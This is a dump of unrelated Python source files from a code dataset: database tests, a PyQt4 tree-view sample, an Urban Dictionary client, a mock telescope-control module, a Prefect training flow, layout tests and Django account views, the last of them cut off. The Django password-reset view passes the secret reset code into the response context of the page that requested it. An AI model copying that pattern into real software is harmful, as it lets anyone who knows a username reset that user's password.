6)],\n GAME_QUERY)\n\n def test_import_games(self):\n db.insert_game(Game(\n '1X', 'Game 1X', 'Author 1X', 'System 1X', 'Blurb 1X', 4, 6))\n db.commit_db()\n self.assert_query(\n [('1X', 'Game 1X', 'Author 1X', 'System 1X', 'Blurb 1X', 4, 6)],\n GAME_QUERY)\n\n db.import_games(Games([\n Game('1A', 'Game 1A', 'Author 1A', 'System 1A', 'Blurb 1A', 4, 6),\n Game('1B', 'Game 1B', 'Author 1B', 'System 1B', 'Blurb 1B', 4, 6),\n ]))\n self.assert_query([\n ('1A', 'Game 1A', 'Author 1A', 'System 1A', 'Blurb 1A', 4, 6),\n ('1B', 'Game 1B', 'Author 1B', 'System 1B', 'Blurb 1B', 4, 6),\n ], GAME_QUERY)\n\n def test_get_games(self):\n self.assertEqual([], list(db.get_games()))\n db.import_games(Games([\n Game('1A', 'Game 1A', 'Author 1A', 'System 1A', 'Blurb 1A', 4, 6),\n Game('1B', 'Game 1B', 'Author 1B', 'System 1B', 'Blurb 1B', 4, 6),\n ]))\n games = db.get_games()\n self.assertTrue(isinstance(games, Games))\n self.assertEqual(list(games), [\n Game('1A', 'Game 1A', 'Author 1A', 'System 1A', 'Blurb 1A', 4, 6),\n Game('1B', 'Game 1B', 'Author 1B', 'System 1B', 'Blurb 1B', 4, 6),\n ])\n\n def test_get_game(self):\n db.import_games(Games([\n Game('1A', 'Game 1A', 'Author 1A', 'System 1A', 'Blurb 1A', 4, 6),\n Game('1B', 'Game 1B', 'Author 1B', 'System 1B', 'Blurb 1B', 4, 6),\n ]))\n self.assertRaises(db.NotFound, db.get_game, '9X')\n self.assertEqual(\n Game('1A', 'Game 1A', 'Author 1A', 'System 1A', 'Blurb 1A', 4, 6),\n db.get_game('1A'))\n\n def test_set_game_tables(self):\n games = Games([\n Game('1A', 'Game 1A', 'Author 1A', 'System 1A', 'Blurb 1A', 1, 2),\n ])\n players = Players([\n Player('Gary Gygax', 'TSR', {'1A': 'G'}),\n Player('Dave Arneson', None, {'1A': 'P'}),\n ])\n game_table = GameTable(\n games['1A'], list(players)[0], list(players)[1:])\n\n self.assert_query([], 'SELECT slot, data FROM game_tables')\n db.set_game_tables('1A', [game_table])\n self.assert_query(\n [('1A', json.dumps(game_table.table_data_dict()))],\n 'SELECT slot, data FROM game_tables')\n\n def test_get_game_tables(self):\n games = Games([\n Game('1A', 'Game 1A', 'Author 1A', 'System 1A', 'Blurb 1A', 1, 2),\n ])\n players = Players([\n Player('Gary Gygax', 'TSR', {'1A': 'G'}),\n Player('Dave Arneson', None, {'1A': 'P'}),\n ])\n 
self.assertEqual([], db.get_game_tables('1A', games['1A'], players))\n\n db.query_db(\n 'INSERT INTO game_tables (slot, data) VALUES (?, ?);',\n ('1A', '{\"gm\": \"Gary Gygax\", \"players\": [\"Dave Arneson\"]}'))\n game_table = GameTable(\n games['1A'], list(players)[0], list(players)[1:])\n self.assertEqual(\n [game_table], db.get_game_tables('1A', games['1A'], players))\n\n def test_set_all_game_tables(self):\n games = Games([\n Game('1A', 'Game 1A', 'Author 1A', 'System 1A', 'Blurb 1A', 1, 2),\n Game('2A', 'Game 2A', 'Author 2A', 'System 2A', 'Blurb 2A', 1, 2),\n ])\n players = Players([\n Player('Gary Gygax', 'TSR', {'1A': 'G', '2A': 'G'}),\n Player('Dave Arneson', None, {'1A': 'P', '2A': 'P'}),\n ])\n table1 = GameTable(games['1A'], list(players)[0], list(players)[1:])\n table2 = GameTable(games['2A'], list(players)[0], list(players)[1:])\n game_tables = GameTables(\n games, players, {'1A': [table1], '2A': [table2]})\n\n self.assert_query([], 'SELECT slot, data FROM game_tables')\n db.set_all_game_tables(game_tables)\n self.assert_query([\n ('1A', json.dumps(table1.table_data_dict())),\n ('2A', json.dumps(table2.table_data_dict())),\n ], 'SELECT slot, data FROM game_tables')\n\n def test_get_all_game_tables(self):\n games = Games([\n Game('1A', 'Game 1A', 'Author 1A', 'System 1A', 'Blurb 1A', 1, 2),\n Game('2A', 'Game 2A', 'Author 2A', 'System 2A', 'Blurb 2A', 1, 2),\n ])\n players = Players([\n Player('Gary Gygax', 'TSR', {'1A': 'G', '2A': 'G'}),\n Player('Dave Arneson', None, {'1A': 'P', '2A': 'P'}),\n ])\n self.assertEqual([], db.get_game_tables('1A', games['1A'], players))\n\n db.query_db(\n 'INSERT INTO game_tables (slot, data) VALUES (?, ?);',\n ('1A', '{\"gm\": \"Gary Gygax\", \"players\": [\"Dave Arneson\"]}'))\n db.query_db(\n 'INSERT INTO game_tables (slot, data) VALUES (?, ?);',\n ('2A', '{\"gm\": \"Gary Gygax\", \"players\": [\"Dave Arneson\"]}'))\n game_tables = db.get_all_game_tables(games, players)\n self.assertEqual(list(game_tables.all_tables()), [\n GameTable(games['1A'], list(players)[0], list(players)[1:]),\n GameTable(games['2A'], list(players)[0], list(players)[1:]),\n ])\n","repo_name":"jerith/table-minion","sub_path":"table_minion/tests/test_db.py","file_name":"test_db.py","file_ext":"py","file_size_in_byte":9309,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"27201501334","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nfrom PyQt4 import QtCore, QtGui\n\nclass Node:\n def __init__(self, data, parent=None):\n self.data=data\n self.parent=parent\n self.children=[]\n\n def addChild(self, data):\n node=Node(data, self)\n self.children.append(node)\n return node\n\n def row(self):\n if self.parent:\n return self.parent.children.index(self)\n else:\n return 0\n\nclass MyModel(QtCore.QAbstractItemModel):\n def __init__(self, parent=None):\n QtCore.QAbstractItemModel.__init__(self, parent)\n # rootノード(表示される最上位のもうひとつ上の階層になる)\n self.root=Node([QtCore.QVariant(\"Title\")]) \n self.setupTree(self.root)\n\n def setupTree(self, node):\n # 1階層\n current=node.addChild([self.trUtf8(\"日本\")])\n # 2階層\n current=current.addChild([self.trUtf8(\"関東\")])\n # 3階層\n current.addChild([self.trUtf8(\"茨城県\")])\n current.addChild([self.trUtf8(\"栃木県\")])\n current.addChild([self.trUtf8(\"群馬県\")])\n current.addChild([self.trUtf8(\"埼玉県\")])\n current.addChild([self.trUtf8(\"千葉県\")])\n current.addChild([self.trUtf8(\"東京都\")])\n current.addChild([self.trUtf8(\"神奈川県\")])\n\n def columnCount(self, parent):\n if 
parent.isValid():\n # parent.internalPointer()でNodeクラスインスタンスにアクセスする\n return len(parent.internalPointer().data)\n else:\n # header\n return len(self.root.data)\n\n def data(self, index, role):\n if not index.isValid():\n return QtCore.QVariant()\n\n if role != QtCore.Qt.DisplayRole:\n return QtCore.QVariant()\n\n return QtCore.QVariant(index.internalPointer().data[index.column()])\n\n def flags(self, index):\n if not index.isValid():\n return QtCore.Qt.ItemIsEnabled\n\n return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable\n\n def headerData(self, section, orientation, role):\n if orientation == QtCore.Qt.Horizontal and role == QtCore.Qt.DisplayRole:\n return self.root.data[section]\n\n return QtCore.QVariant()\n\n def index(self, row, column, parent):\n if row < 0 or column < 0 or row >= self.rowCount(parent) or column >= self.columnCount(parent):\n return QtCore.QModelIndex()\n\n if not parent.isValid():\n parentItem = self.root\n else:\n parentItem = parent.internalPointer()\n\n childItem = parentItem.children[row]\n if childItem:\n return self.createIndex(row, column, childItem)\n else:\n return QtCore.QModelIndex()\n\n def parent(self, index):\n if not index.isValid():\n return QtCore.QModelIndex()\n\n childItem = index.internalPointer()\n parentItem = childItem.parent\n\n if parentItem == self.root:\n return QtCore.QModelIndex()\n\n return self.createIndex(parentItem.row(), 0, parentItem)\n\n def rowCount(self, parent):\n if parent.column() > 0:\n return 0\n\n if not parent.isValid():\n parentItem = self.root\n else:\n parentItem = parent.internalPointer()\n\n return len(parentItem.children)\n\n\nclass MyWidget(QtGui.QMainWindow):\n def __init__(self, parent=None):\n QtGui.QWidget.__init__(self, parent)\n tree = QtGui.QTreeView(self)\n model=MyModel(self)\n tree.setModel(model)\n self.setCentralWidget(tree)\n\nif __name__==\"__main__\":\n app = QtGui.QApplication(sys.argv)\n widget = MyWidget()\n widget.show()\n sys.exit(app.exec_())","repo_name":"hdkkato/qtsample","sub_path":"qtreeview/sample2.py","file_name":"sample2.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72906526179","text":"import requests\n\nURL = \"http://api.urbandictionary.com/v0/define\"\n\nclass UrbanDefinition:\n\tdef __init__(self, term, definition, example=\"\"):\n\t\tself.term = term\n\t\tself.definition = definition\n\t\tself.example = example\n\n\tdef to_string(self):\n\t\treturn f\"{self.term}:\\n{self.definition}\\nExample: {self.example}\\n\\n\"\n\nclass UrbanDictionaryError(Exception):\n\tpass\n\ndef get_definition(term):\n\tr = requests.get(URL, params={\"term\": term})\n\ttry:\n\t\tjson = r.json()\n\texcept ValueError as e:\n\t\traise UrbanDictionaryError(f\"Error parsing json response. 
{e}\")\n\ttry:\n\t\tres = []\n\t\tfor entry in json[\"list\"]:\n\t\t\ttemp = UrbanDefinition(entry[\"word\"], entry[\"definition\"], entry[\"example\"])\n\t\t\tres.append(temp)\n\texcept KeyError as e:\n\t\traise UrbanDictionaryError(f\"Error parsing result: {e}\")\n\treturn res\n\n","repo_name":"TheQuinbox/lookup","sub_path":"plugins/urban_dictionary/ud/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17365836486","text":"\"\"\"\nFake enough of SAL to let my write a notebook illustrating auxTel scripting\n\"\"\"\n\n__all__ = [\"Command\", \"camera_command_turnOnLaserC\", \"camera_command_setFilterC\"]\n\nimport asyncio\nimport logging\nimport sys\nimport time\n\nclass Command():\n ACK = 300\n INPROGRESS = 301\n STALLED = 302\n COMPLETE = 303\n NOPERM = -300\n NOACK = -301\n FAILED = -302\n ABORTED = -303\n TIMEOUT = -304\n \n def __init__(self, cmdName):\n self._cmdName = cmdName\n\nclass SAL_camera():\n __cmdId = -1\n \n def __init__(self):\n self._commands = dict()\n self._pending = dict()\n\n def salShutdown(self):\n pass\n\n def __getCmdId(self, cmdName):\n if not cmdName in self._commands:\n raise NameError(\"Unknown SAL command \\\"%s\\\"\" % cmdName)\n\n self.__cmdId += 1\n return self.__cmdId\n\n def salCommand(self, cmdName):\n self._commands[cmdName] = Command(cmdName)\n\n def salEvent(self, name):\n pass\n #\n # Commands\n #\n def issueCommand_setFilter(self, data):\n cmdId = self.__getCmdId(data.cmdName)\n self._pending[cmdId] = data\n\n print(\"%s Setting %s\" % (time.asctime(), self._pending[cmdId].filterName), file=sys.stderr)\n sys.stderr.flush()\n\n return cmdId\n\n def waitForCompletion_setFilter(self, cmdId, timeout=0):\n if not cmdId in self._pending:\n raise NameError(\"Command %d not found\" % cmdId)\n\n time.sleep(1.5)\n print(\"%s Set filter to %s\" % (time.asctime(), self._pending[cmdId].filterName), file=sys.stderr)\n sys.stderr.flush()\n del self._pending[cmdId]\n\n return Command.COMPLETE\n \n async def awaitForCompletion_setFilter(self, cmdId, timeout=0):\n if not cmdId in self._pending:\n raise NameError(\"Command %d not found\" % cmdId)\n\n await asyncio.sleep(1.5)\n\n print(\"%s Set filter to %s\" % (time.asctime(), self._pending[cmdId].filterName), file=sys.stderr)\n sys.stderr.flush()\n del self._pending[cmdId]\n\n return Command.COMPLETE\n \n def issueCommand_turnOnLaser(self, data):\n cmdId = self.__getCmdId(data.cmdName)\n self._pending[cmdId] = data\n\n print(\"%s turning laser on\" % (time.asctime()), file=sys.stderr)\n sys.stderr.flush()\n\n return cmdId\n\n def waitForCompletion_turnOnLaser(self, cmdId, timeout=0):\n if not cmdId in self._pending:\n raise NameError(\"Command %d not found\" % cmdId)\n\n time.sleep(2)\n print(\"%s laser is warm\" % (time.asctime()), file=sys.stderr)\n sys.stderr.flush()\n del self._pending[cmdId]\n\n return Command.COMPLETE\n\n async def awaitForCompletion_turnOnLaser(self, cmdId, timeout=0):\n if not cmdId in self._pending:\n raise NameError(\"Command %d not found\" % cmdId)\n\n await asyncio.sleep(2)\n \n print(\"%s laser is warm\" % (time.asctime()), file=sys.stderr)\n sys.stderr.flush()\n del self._pending[cmdId]\n\n return Command.COMPLETE\n\n def issueCommand_cameraIntegrate(self, data):\n cmdId = self.__getCmdId(data.cmdName)\n self._pending[cmdId] = data\n\n print(\"%s opening shutter\" % (time.asctime()), file=sys.stderr)\n sys.stderr.flush()\n\n return cmdId\n\n def 
getResponse_cameraIntegrate(self, cmdId, timeout=0):\n if not cmdId in self._pending:\n raise NameError(\"Command %d not found\" % cmdId)\n\n data = self._pending[cmdId]\n\n if time.time() < data.time0 + data.expTime:\n return Command.INPROGRESS\n\n print(\"%s Shutter closed\" % (time.asctime()), file=sys.stderr)\n sys.stderr.flush()\n\n del self._pending[cmdId]\n\n Event.getEvent(\"exposureId\").done = True # exposure ID is available\n\n return Command.COMPLETE\n\n async def waitForCompletion_cameraIntegrate(self, cmdId, timeout=0, pollTime=0.1):\n if not cmdId in self._pending:\n raise NameError(\"Command %d not found\" % cmdId)\n\n while True:\n status = self.getResponse_cameraIntegrate(cmdId)\n \n if status == Command.COMPLETE:\n return status\n\n if timeout > 0 and time.time() > data.time0 + timeout:\n return Command.TIMEOUT\n\n await asyncio.sleep(pollTime)\n\n#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n def getEvent_SummaryState(self, event):\n return 0 if event.done else 1\n\n#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n \nclass Data():\n \"\"\"Base class for all data objects\"\"\"\n\n def __init__(self, cmdName):\n self.cmdName = cmdName\n if cmdName is not None:\n self.log = logging.getLogger(cmdName)\n self.time0 = time.time()\n\nclass camera_command_setFilterC(Data): \n def __init__(self, filterName):\n super().__init__(\"setFilter\")\n self.filterName = filterName\n \nclass camera_command_turnOnLaserC(Data): \n def __init__(self):\n super().__init__(\"turnOnLaser\")\n \nclass camera_command_cameraIntegrateC(Data): \n def __init__(self, expTime):\n super().__init__(\"cameraIntegrate\")\n self.expTime = expTime\n\nclass Event():\n \"\"\"Base class for all events\"\"\"\n\n _events = {}\n\n @classmethod\n def getEvent(cls, name):\n return cls._events[name]\n\n def __init__(self, name):\n self.name = name\n type(self)._events[name] = self\n\nclass camera_logevent_exposureIdC(Event):\n nextVisit = 0\n\n def __init__(self):\n super().__init__(\"exposureId\")\n self.visit = type(self).nextVisit\n self.done = False\n type(self).nextVisit += 1\n","repo_name":"LSST-nonproject/rhl_auxTel","sub_path":"python/lsst/sal.py","file_name":"sal.py","file_ext":"py","file_size_in_byte":5762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"5114702233","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# author:SingWeek\nimport re\nfrom collections import Counter\n\nfrom broad.util.encodeUtil import dateConverter\n\n\ndef extract_date(content):\n date_reg_exp = re.compile('\\d{4}[-/]\\d{2}[-/]\\d{2}')\n matches_list=date_reg_exp.findall(content)\n standard_matches = []\n for match in matches_list:\n standard_time = dateConverter(match)\n if standard_time != \"\":\n standard_matches.append(standard_time)\n if len(standard_matches) > 0:\n date_str = Counter(standard_matches).most_common(1)[0][0]\n return date_str\n else:\n return None\n\n\nif __name__ == '__main__':\n content = \"如这样的日期2016-12-35也可以匹配到.2016-12-35测试如下.\"\n print(extract_date(content))\n","repo_name":"chensian/Broad_Crawler","sub_path":"broad_crawler/broad/util/date_extract.py","file_name":"date_extract.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25033006253","text":"class Stack:\n def __init__(self):\n self.arr=[]\n\n def push(self,data):\n self.arr.append(data)\n\n def pop(self):\n if 
self.size()==0:\n return -1\n return self.arr.pop()\n \n def top(self):\n if self.size()==0:\n return -1\n return self.arr[-1]\n \n def size(self):\n return len(self.arr)\n\n\n\n\ndef inValid(s):\n dict = {\"}\":\"{\",\")\":\"(\",\"]\":\"[\"}\n lt = list(s)\n stack = Stack()\n for ele in lt:\n if ele==\"{\" or ele==\"(\" or ele==\"[\":\n stack.push(ele)\n if ele in dict:\n if stack.top()==-1:\n return False\n if stack.top() == dict[ele]:\n stack.pop()\n else:\n return False\n if stack.size()==0:\n return True\n return False\n\n\ns = \"([]){}(\"\nprint(inValid(s))\n\n","repo_name":"abhinav215/DsAlgo","sub_path":"Striver/day13/Q5.py","file_name":"Q5.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"35762549984","text":"import pandas as pd\n\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\n\nfrom prefect import flow, task\nfrom prefect.task_runners import SequentialTaskRunner\nfrom prefect import get_run_logger \n\nimport datetime\nfrom datetime import datetime\nfrom datetime import date\n\nimport pickle\n\n@task\ndef read_data(path):\n df = pd.read_parquet(path)\n return df\n\n@task\ndef prepare_features(df, categorical, train=True):\n df['duration'] = df.dropOff_datetime - df.pickup_datetime\n df['duration'] = df.duration.dt.total_seconds() / 60\n df = df[(df.duration >= 1) & (df.duration <= 60)].copy()\n\n mean_duration = df.duration.mean()\n \n logger = get_run_logger()\n \n if train:\n logger.info(f\"The mean duration of training is {mean_duration}\")\n\n else:\n logger.info(f\"The mean duration of validation is {mean_duration}\")\n \n df[categorical] = df[categorical].fillna(-1).astype('int').astype('str')\n return df\n\n@task\ndef train_model(df, categorical):\n\n train_dicts = df[categorical].to_dict(orient='records')\n dv = DictVectorizer()\n X_train = dv.fit_transform(train_dicts) \n y_train = df.duration.values\n\n logger = get_run_logger()\n logger.info(f\"The shape of X_train is {X_train.shape}\")\n logger.info(f\"The DictVectorizer has {len(dv.feature_names_)} features\")\n\n lr = LinearRegression()\n lr.fit(X_train, y_train)\n y_pred = lr.predict(X_train)\n mse = mean_squared_error(y_train, y_pred, squared=False)\n logger.info(f\"The MSE of training is: {mse}\")\n return lr, dv\n\n@task\ndef run_model(df, categorical, dv, lr):\n val_dicts = df[categorical].to_dict(orient='records')\n X_val = dv.transform(val_dicts) \n y_pred = lr.predict(X_val)\n y_val = df.duration.values\n\n mse = mean_squared_error(y_val, y_pred, squared=False)\n\n logger = get_run_logger()\n logger.info(f\"The MSE of validation is: {mse}\")\n return\n\n@task\ndef get_path(date_in):\n #str = './data/fhv_tripdata_2021-01.parquet', \n #val_path: str = './data/fhv_tripdata_2021-02.parquet')\n\n #If date is None, use the current day. 
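\n # Hedged sketch (assumption; illustrative only): the \"%02d\" % (process_date.month - 2)\n # arithmetic below underflows for January and February dates (month 0 or -1).\n # A rollover-safe variant would be:\n # y, m = process_date.year, process_date.month - 2\n # if m < 1:\n # y, m = y - 1, m + 12\n # train = \"./data/fhv_tripdata_%d-%02d.parquet\" % (y, m)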
\n # Use the data from 2 months back as the training data and the data from the previous month as validation data.\n if (date_in == None):\n #process_date = datetime.date.today()\n process_date = date.today()\n else:\n process_date = datetime.strptime(date_in, \"%Y-%m-%d\")\n \n train = \"./data/fhv_tripdata_2021-%02d.parquet\" % (process_date.month -2)\n val = \"./data/fhv_tripdata_2021-%02d.parquet\" % (process_date.month - 1) \n logger = get_run_logger()\n logger.info(f\"Training data path = {train}\")\n logger.info(f\"Validation data path = {val}\")\n\n return train, val\n\n\nfrom prefect.deployments import DeploymentSpec\n#from prefect.orion.schemas.schedules import IntervalSchedule\nfrom prefect.orion.schemas.schedules import CronSchedule\nfrom prefect.flow_runners import SubprocessFlowRunner\n\n@flow(task_runner=SequentialTaskRunner())\n#def main(train_path: str = './data/fhv_tripdata_2021-01.parquet', \n# val_path: str = './data/fhv_tripdata_2021-02.parquet'):\ndef main(date=None):\n \n train_path, val_path = get_path(date).result() \n #str = './data/fhv_tripdata_2021-01.parquet', \n #val_path: str = './data/fhv_tripdata_2021-02.parquet'):\n\n categorical = ['PUlocationID', 'DOlocationID']\n\n df_train = read_data(train_path)\n df_train_processed = prepare_features(df_train, categorical)\n\n df_val = read_data(val_path)\n df_val_processed = prepare_features(df_val, categorical, False)\n\n # train the model\n lr, dv = train_model(df_train_processed, categorical).result()\n run_model(df_val_processed, categorical, dv, lr)\n\n \n model_name = f\"models/model-{date}.bin\"\n dv_name = f\"models/dv-{date}.b\"\n\n with open(model_name, 'wb') as f_out:\n pickle.dump((lr), f_out)\n\n with open(dv_name, \"wb\") as f_out:\n pickle.dump(dv, f_out)\n \n\n#no need to call main from scheduled deployment\n#main()\n#main(\"2021-03-15\")\n#main(date=\"2021-08-15\")\n\nDeploymentSpec(\n flow=main,\n #flow_location=\"./homework.py\",\n name=\"hw3_model_training\",\n schedule=CronSchedule(\n #cron=\"5 * * * *\", #test version every 5 minutes\n cron=\"0 9 15 * *\",\n timezone=\"America/New_York\"),\n flow_runner=SubprocessFlowRunner(),\n #tells to run locally and not in container or k8\n tags=[\"ml-cron\"]\n)\n","repo_name":"sparkyfina/mlops","sub_path":"hw3/homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8850800146","text":"import unittest\n\nfrom labella.force import DEFAULT_OPTIONS\nfrom labella.force import Force\nfrom labella.node import Node\n\n\nclass ForceTestCase(unittest.TestCase):\n def test_nodes(self):\n force = Force()\n\n # it should return current value when called without argument\n self.assertEqual(force.nodes(), [])\n force.nodes([1])\n self.assertEqual(force.nodes(), [1])\n # it should set value when called with an argument\n force.nodes([1])\n self.assertEqual(force.nodes(), [1])\n\n def test_options(self):\n force = Force()\n\n # it should return current value when called without an argument\n self.assertEqual(force.options, DEFAULT_OPTIONS)\n\n # it should set value when called with an argument\n force.set_options({\"maxPos\": 200})\n self.assertEqual(force.options[\"maxPos\"], 200)\n force.set_options({\"maxPos\": 400, \"stubWidth\": 30})\n self.assertEqual(force.options[\"maxPos\"], 400)\n self.assertEqual(force.options[\"stubWidth\"], 30)\n\n def test_compute_1(self):\n # should find location for the nodes that make them not overlap\n 
nodes = [\n Node(1, 50),\n Node(2, 50),\n Node(3, 50),\n Node(3, 50),\n Node(3, 50),\n Node(304, 50),\n Node(454, 50),\n Node(454, 50),\n Node(454, 50),\n Node(804, 50),\n Node(804, 70),\n Node(804, 50),\n Node(804, 50),\n Node(854, 50),\n Node(854, 50),\n ]\n force = Force()\n force.nodes(nodes)\n force.compute()\n\n current_pos = [n.currentPos for n in nodes]\n expected_pos = [\n 25,\n 78,\n 131,\n 184,\n 237,\n 304,\n 401,\n 454,\n 507,\n 673,\n 736,\n 799,\n 852,\n 905,\n 958,\n ]\n self.assertEqual(current_pos, expected_pos)\n\n def test_compute_2(self):\n # should respect the maxPos option\n nodes = [\n Node(1, 50),\n Node(2, 50),\n Node(3, 50),\n Node(3, 50),\n Node(3, 50),\n Node(304, 50),\n Node(454, 50),\n Node(454, 50),\n Node(454, 50),\n Node(804, 50),\n Node(804, 70),\n Node(804, 50),\n Node(804, 50),\n Node(854, 50),\n Node(854, 50),\n ]\n force = Force({\"maxPos\": 904})\n force.nodes(nodes)\n force.compute()\n\n for node in nodes:\n self.assertLessEqual(node.currentRight(), 904)\n\n def test_compute_3(self):\n # should respect the minPos option\n nodes = [\n Node(1, 50),\n Node(2, 50),\n Node(3, 50),\n Node(3, 50),\n Node(3, 50),\n Node(304, 50),\n Node(454, 50),\n Node(454, 50),\n Node(454, 50),\n Node(804, 50),\n Node(804, 70),\n Node(804, 50),\n Node(804, 50),\n Node(854, 50),\n Node(854, 50),\n ]\n force = Force({\"minPos\": 30})\n force.nodes(nodes)\n force.compute()\n\n for node in nodes:\n self.assertGreater(node.currentRight(), 30) # is this right?\n self.assertGreaterEqual(node.currentLeft(), 30)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"GjjvdBurg/labella.py","sub_path":"tests/test_force.py","file_name":"test_force.py","file_ext":"py","file_size_in_byte":3506,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"34"} +{"seq_id":"20457125177","text":"from django.shortcuts import render, render_to_response\nfrom django.contrib.auth import login, logout, authenticate\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.template import *\nfrom django.conf import settings\nfrom app.login.models import U_hash, calculate_hash\nimport string\nimport random\nimport socket\nfrom datetime import datetime, timedelta\nfrom django.core.mail import send_mail\nfrom django.core.files.storage import FileSystemStorage\n\n\ndef change_password(request):\n if request.user.is_authenticated():\n return HttpResponseRedirect('/home')\n\n user_send = False\n if \"update_Cambio_val\" in request.POST:\n if request.POST.get(\"user\") and not request.POST.get(\"cod_validate\"):\n request.session['usr_change'] = request.POST.get(\"user\")\n try:\n u = User.objects.get(username=request.session['usr_change'])\n if u.is_staff:\n return HttpResponseRedirect('/error/denied')\n if u:\n subject = \"Solicitud cambio de password - Mammoft Inventory Managment\"\n mensaje = \"Usuario: \"+ u.username +\"\\nCódigo de validacion:\"+str(u.u_hash.hash)\n send_mail(subject, mensaje, settings.EMAIL_HOST_USER, [settings.EMAIL_HOST_USER], fail_silently=False)\n\n hash = u.u_hash.hash\n usuario = u.username\n user_send = True\n context = {\"user_send\":user_send,\n \"hash\":hash,\n \"usuario\":usuario}\n return render(request,\"Content_login/Conten_login.html\",context)\n except User.DoesNotExist:\n user_send = False\n context = {\"msg\":\"El usuario no se encuentra en nuestra base de datos\",\n \"user_send\":user_send,}\n 
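# clear the stashed username so the wizard starts fresh on the next attempt\n                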
request.session.pop('usr_change')\n return render(request,\"Content_login/Conten_login.html\",context)\n\n if \"update_cod\" in request.POST:\n if request.POST.get(\"cod_validate\"):\n can_change = False\n codigo_validacion = request.POST.get(\"cod_validate\")\n usuario = request.session.get('usr_change')\n u = User.objects.get(username=usuario)\n hash = u.u_hash.hash\n if codigo_validacion == hash:\n can_change = True\n user_send = True\n context = {\"user_send\":user_send,\n \"can_change\":can_change,\n \"usuario\":usuario}\n return render(request,\"Content_login/Conten_login.html\",context)\n else:\n hash = u.u_hash.hash\n usuario = u.username\n user_send = True\n context = {\"msg\":\"El codigo de validación no es correcto\",\n \"user_send\":user_send,\n \"hash\":hash,\n \"usuario\":usuario}\n return render(request,\"Content_login/Conten_login.html\",context)\n\n if \"update_pass\" in request.POST:\n if request.POST.get(\"pone\") and request.POST.get(\"ptwo\"):\n p1 = request.POST.get(\"pone\")\n p2 = request.POST.get(\"ptwo\")\n usuario = request.session.get('usr_change')\n u = User.objects.get(username=usuario)\n hash = u.u_hash.hash\n\n if p1 == p2:\n u.set_password(p1)\n u.save()\n U_hash.objects.filter(user_id=u, hash=hash).update(hash=calculate_hash())\n request.session.pop('usr_change')\n return HttpResponseRedirect('/home')\n else:\n can_change = True\n user_send = True\n context = {\"msg\":\"Los password no coinciden\",\n \"user_send\":user_send,\n \"can_change\":can_change,\n \"usuario\":usuario}\n return render(request,\"Content_login/Conten_login.html\",context)\n else:\n usuario = request.session.get('usr_change')\n can_change = True\n user_send = True\n context = {\"msg\":\"Aun no rellenas los campos\",\n \"user_send\":user_send,\n \"can_change\":can_change,\n \"usuario\":usuario}\n return render(request,\"Content_login/Conten_login.html\",context)\n\n context = {\"user_send\":user_send,}\n return render(request,\"Content_login/Conten_login.html\",context)\n\n@login_required(login_url='/login')\ndef profile_view(request):\n u = User.objects.get(username=request.user)\n\n if \"edit_profile\" in request.POST:\n editing = True\n context = {'editing':editing,}\n return render(request, \"user/profile.html\", context)\n\n if \"save_profile\" in request.POST:\n myfile = request.FILES.get('picture')\n fs = FileSystemStorage()\n try:\n filename = fs.save(\"login/users/profile/\" + myfile.name, myfile)\n U_hash.objects.filter(user_id=u).update(avatar=fs.url(filename))\n except AttributeError:\n pass\n\n if \"calendar\" in request.POST:\n nacimiento = request.POST.get(\"calendar\")\n fn = datetime.strptime(nacimiento, '%d/%m/%Y').date()\n age = datetime.now().date() - fn\n age_ac = str((age.days / 365)).split('.')[0]\n U_hash.objects.filter(user_id=u).update(f_nacimiento=fn, edad=age_ac)\n\n if \"gender\" in request.POST:\n U_hash.objects.filter(user_id=u).update(sexo=request.POST.get('gender'))\n\n if \"cargo\" in request.POST:\n if request.POST.get('cargo').strip() != \"\":\n U_hash.objects.filter(user_id=u).update(cargo=request.POST.get('cargo'))\n\n if \"direccion\" in request.POST:\n if request.POST.get('direccion').strip() != \"\":\n U_hash.objects.filter(user_id=u).update(direccion=request.POST.get('direccion'))\n\n editing = False\n context = {'editing':editing}\n return render(request, \"user/profile.html\", context)\n\n context = {}\n return render(request, \"user/profile.html\", context)\n\n@login_required(login_url='/login')\ndef index_view(request):\n if 
